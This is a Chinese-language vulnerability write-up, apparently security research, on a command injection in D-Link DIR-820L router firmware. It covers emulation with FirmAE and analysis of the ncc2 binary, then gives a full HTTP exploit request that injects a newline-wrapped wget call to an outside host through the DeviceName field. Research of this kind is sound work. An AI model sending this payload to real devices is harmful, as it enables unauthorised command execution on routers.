binwalk提取之后使用FirmAE进行固件模拟
sudo ./run.sh -r DIR820L ./firmwares/DIR820LA1FW105B03.bin
![{F]RL_R)XMZ[58V75RJ@CA.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651801117590-4a0d4067-664c-4a6a-b537-cb188b46b065.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ufccbb363&margin=%5Bobject%20Object%5D&name=%7BF%60%5DRL_R%29XMZ%5B58V75RJ%40CA.png&originHeight=518&originWidth=872&originalType=binary&ratio=1&rotation=0&showTitle=false&size=115889&status=done&style=none&taskId=ue852f27e-34aa-4e58-8732-fb517817b39&title=)<br />两个true说明http服务和network模拟成功了<br />来到networksettings页面,可以触发漏洞的点比较多,例如IP,name,device等,这里是设置Device Name时触发的命令执行。<br />![7}ERK)QKT1F2%6RWMO4
CIR.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651803026916-267984a7-e592-41ab-8931-dd5e45a8a461.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u3f1f08a3&margin=%5Bobject%20Object%5D&name=7%7DERK%29QKT1F2%256RWMO4%60CIR.png&originHeight=656&originWidth=1206&originalType=binary&ratio=1&rotation=0&showTitle=false&size=131256&status=done&style=none&taskId=uc7251a21-2645-4198-b99e-7b5bd528db1&title=)
来到该固件的文件系统目录下,可以看到一个耳熟能详的二进制应用 ncc2
这个应用主要进行网络等底层操作相关的操作,使用IDA进行分析
此处可以判断该函数应该是来自于一个动态链接库
![J00IFU`D%RQ{IPK88})05S.png
![$%AYBRVJ$UI8RN@$ED]BUX.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651804050473-cc38dd0d-25ec-4c3f-a103-30234c8d6cf1.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uc862fe8a&margin=%5Bobject%20Object%5D&name=%24%25AYBRVJ%24UI8RN%40%24ED_%5DBUX.png&originHeight=782&originWidth=1098&originalType=binary&ratio=1&rotation=0&showTitle=false&size=54613&status=done&style=none&taskId=u1f816491-6de5-4812-8ba9-0dab942b50f&title=)
可以看到过滤了几个符号
`\;'|
但是没有过滤\n也就是%0a,所以我们可以使用%0a进行绕过
exp
POST /get_set.ccp HTTP/1.1
Host: 192.168.0.1
Content-Length: 765
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.0.1
Referer: http://192.168.0.1/lan.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: hasLogin=1
Connection: close
ccp_act=set&old_ip=192.168.0.1&old_mask=255.255.255.0&new_ip=192.168.0.1&new_mask=255.255.255.0&nextPage=lan.asp&lanHostCfg_IPAddress_1.1.1.0=192.168.0.1&lanHostCfg_SubnetMask_1.1.1.0=255.255.255.0&lanHostCfg_DomainName_1.1.1.0=&lanHostCfg_DNSRelay_1.1.1.0=1&lanHostCfg_DHCPServerEnable_1.1.1.0=1&lanHostCfg_MinAddress_1.1.1.0=192.168.0.100&lanHostCfg_MaxAddress_1.1.1.0=192.168.0.200&lanHostCfg_DHCPLeaseTime_1.1.1.0=1440&lanHostCfg_DeviceName_1.1.1.0=%0awget http://192.168.0.2%0a&lanHostCfg_AlwaysBroadcast_1.1.1.0=0&lanHostCfg_NetBIOSAnnouncement_1.1.1.0=0&lanHostCfg_NetBIOSLearn_1.1.1.0=0&lanHostCfg_NetBIOSScope_1.1.1.0=&lanHostCfg_NetBIOSNodeType_1.1.1.0=2&lanHostCfg_PrimaryWINSAddress_1.1.1.0=0.0.0.0&lanHostCfg_SecondaryWINSAddress_1.1.1.0=0.0.0.0&1649259644679=1649259644679